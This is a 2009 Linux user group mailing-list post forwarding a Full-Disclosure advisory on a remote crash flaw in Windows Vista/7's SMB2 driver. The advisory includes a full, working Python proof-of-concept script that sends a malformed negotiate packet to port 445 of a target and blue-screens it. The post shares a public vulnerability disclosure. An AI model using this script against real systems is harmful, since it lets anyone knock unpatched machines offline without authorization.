[PLUG] The Bad Old Days

Sean Collins on 8 Sep 2009 11:35:11 -0700

[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

[PLUG] The Bad Old Days

From: Sean Collins <sean@seanmcollins.com>

To: "Philadelphia Linux User's Group Discussion List" <plug@lists.phillylinux.org>

Subject: [PLUG] The Bad Old Days

Date: Tue, 8 Sep 2009 14:34:16 -0400

Reply-to: Philadelphia Linux User's Group Discussion List <plug@lists.phillylinux.org>

Sender: plug-bounces@lists.phillylinux.org

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 http://it.slashdot.org/story/09/09/08/1345247/Windows-7-Reintroduces-Remote-BSoD Slashdot puts it best: > "Remember the good old days of the 1990s, when you could teardrop > attackany Windows user who'd annoyed you and bluescreen them? Well, they're back. > > ============================================= > - Release date: September 7th, 2009 > - Discovered by: Laurent Gaffié > - Severity: Medium/High > ============================================= > > I. VULNERABILITY > ------------------------- > Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. > > II. BACKGROUND > ------------------------- > Windows vista and newer Windows comes with a new SMB version named > SMB2. > See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0 > for more details. > > III. DESCRIPTION > ------------------------- > SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE > PROTOCOL REQUEST functionnality. > The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send > to a SMB server, and it's used > to identify the SMB dialect that will be used for futher > communication. > > IV. PROOF OF CONCEPT > ------------------------- > > Smb-Bsod.py: > > #!/usr/bin/python > # When SMB2.0 recieve a "&" char in the "Process Id High" SMB header > field it dies with a > # PAGE_FAULT_IN_NONPAGED_AREA > > from socket import socket > from time import sleep > > host = "IP_ADDR", 445 > buff = ( > "\x00\x00\x00\x90" # Begin SMB header: Session message > "\xff\x53\x4d\x42" # Server Component: SMB > "\x72\x00\x00\x00" # Negociate Protocol > "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 > "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" > "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" > "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" > "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" > "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" > "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" > "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" > "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" > "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" > "\x30\x30\x32\x00" > ) > s = socket() > s.connect(host) > s.send(buff) > s.close() > > V. BUSINESS IMPACT > ------------------------- > An attacker can remotly crash without no user interaction, any Vista/ > Windows 7 machine with SMB enable. > Windows Xp, 2k, are NOT affected as they dont have this driver. > > VI. SYSTEMS AFFECTED > ------------------------- > Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Win > Server 2008 > as it use the same SMB2.0 driver (not tested). > > VII. SOLUTION > ------------------------- > Vendor contacted, but no patch available for the moment. > Close SMB feature and ports, until a patch is provided. > > VIII. REFERENCES > ------------------------- > http://microsoft.com > > IX. CREDITS > ------------------------- > This vulnerability has been discovered by Laurent Gaffié > Laurent.gaffie{remove-this}(at)gmail.com > http://g-laurent.blogspot.com/ > > X. LEGAL NOTICES > ------------------------- > The information contained within this advisory is supplied "as-is" > with no warranties or guarantees of fitness of use or otherwise. > I accept no responsibility for any damage caused by the use or > misuse of this information. > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ I have no idea how we could stop malicious SMB packets on a Windows LAN. You're cooked. Goodnight and good luck. Thank You, Sean Collins -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.12 (Darwin) iEYEARECAAYFAkqmo6wACgkQ9g9WSXiROTGD/gCgmZ8N746j61ygoqvtSOyIv+vu vuQAnidq+0LnEjLg7aJ4o61KYrkt4DBr =ox0Q -----END PGP SIGNATURE----- ___________________________________________________________________________ Philadelphia Linux Users Group -- http://www.phillylinux.org Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce General Discussion -- http://lists.phillylinux.org/mailman/listinfo/plug

Follow-Ups:

Re: [PLUG] The Bad Old Days
From: Douglas Muth <doug.muth@gmail.com>

Re: [PLUG] The Bad Old Days
From: sean finney <seanius@seanius.net>

Prev by Date: Re: [PLUG] XKCD, Map of the internet, and "Fractal" mapping

Next by Date: Re: [PLUG] Windows "safer" than Linux (ha ha ha ha ha....

Previous by thread: [PLUG] [plug-announce] WEDNESDAY: September 9, 2009: "Virtualizing the Enterprise: How We Did It" (PLUG North @ CoreDial in Plymouth Meeting)

Next by thread: Re: [PLUG] The Bad Old Days

Index(es):

Date

Thread